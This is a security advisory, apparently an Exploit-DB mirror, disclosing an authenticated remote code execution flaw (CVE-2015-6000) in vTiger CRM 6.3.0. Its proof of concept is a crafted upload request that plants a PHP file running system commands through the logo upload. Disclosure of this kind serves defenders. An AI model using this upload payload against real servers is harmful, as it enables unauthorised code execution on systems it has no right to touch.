vTiger CRM 6.3.0 – (Authenticated) Remote Code Execution

• Exploit Database
• 34 阅读

• 作者： Benjamin Daniel Mussler
  日期： 2015-09-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38345/

• -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  
  
  # Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
  # Date: 2015-09-28
  # Exploit Author: Benjamin Daniel Mussler
  # Vendor Homepage: https://www.vtiger.com
  # Software Link: https://www.vtiger.com/open-source-downloads/
  # Version: 6.3.0 (and lower)
  # Tested on: Linux (Ubuntu)
  # CVE : CVE-2015-6000
  # Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
  
  
  === Description ===
  
  Vtiger CRM's administration interface allows for the upload of a company
  logo. Instead of uploading an image, an attacker may choose to upload a
  file containing PHP code and run this code by accessing the resulting
  PHP file.
  
  Detailed description:
  http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
  
  
  === PoC ===
  
  Through a specially crafted HTTP-POST request, a PHP file is stored on
  the server hosting the Vtiger CRM software:
  
  POST /index.php HTTP/1.1
  Host: [...]
  Cookie: [...]
  Connection: keep-alive
  Content-Type: multipart/form-data; boundary=---------------------------51732462825208
  Content-Length: 2040
  
  -----------------------------51732462825208
  Content-Disposition: form-data; name="__vtrftk"
  
  [...]
  -----------------------------51732462825208
  Content-Disposition: form-data; name="logo"; filename="2.php"
  Content-Type: image/jpeg
  
  <? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
  -----------------------------51732462825208
  Content-Disposition: form-data; name="address"
  [...]
  
  
  The resulting PHP file can then be accessed at
  
  [Vtiger URL]/test/logo/2.php
  
  
  
  
  
  - --
  Benjamin Daniel MUSSLER
  
  Ix-Xgħajra, Malta Tel (MT) +356 9965 3798
  Karlsruhe, Germany Tel (DE) +49 721 989 0150
  Web: https://FL7.DE PGP: https://FL7.DE/pgp/
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v2.0.21 (MingW32)
  
  iQIcBAEBAgAGBQJWCVaeAAoJEAg0a3ng3v4f108P/0u+CUuUKSsSFiQt4S/HVAnw
  5ykzNoZ/T1v0LUrItI1bZPeTyRr6VUandYclg68OM3VY0zc4x9161ScSlcnIitVO
  AasvEw7mGguAR4Pe2i84LpPNvE6Bi+MJqU6vnBqZVmQMXUY8k+Mb0ufM/DMByLPj
  dcozrAgI9ZQC3pnWiOPigD+gHe/AxY3Z1cxQLluOqBmMf7f3JXC+1dZt91EScuyi
  lHNtd6/uRtHJKqBG8MZMXnq49OxTk7iiqQmb393RizPL0eI8FumwaCXTDnLgRwX3
  7XQfmg3sCzT1jPSQB4/UYciePPOS4EREjDA/RW5ydtGRCkZPvmjUlfaFMwTjlCd1
  dpRIRlzDBWUCVFIqkp2TGkrkbckA1hnehH1q64sQ4KopdKl0tPJ8yLumVr2Uvwtq
  iLAbhQcn6+Cr9gctzOlrbj7BqY9uC0HfVdsl1qOCN5v3Yrbq7h/ToPnKGACLQN7t
  sALb61+vvriPimTVZD3AQg9t82G1brPHMzp+cLwjhYtw8b+2rohAA0JoUgBsCUHG
  8dgnHI1K514soGkCDB4Mk2oM5W8T2tMsxvX/iQDH45IL3hYrROnWUnW+Fd3hA3ks
  VsqaNpaDEm+allop6OH3PETs6rGsLyaspCJBdkqKqxNOS6XE+lScrBVxzNL4VJL2
  i8fbvZ/RIkuBT0Z79hUV
  =gMXq
  -----END PGP SIGNATURE-----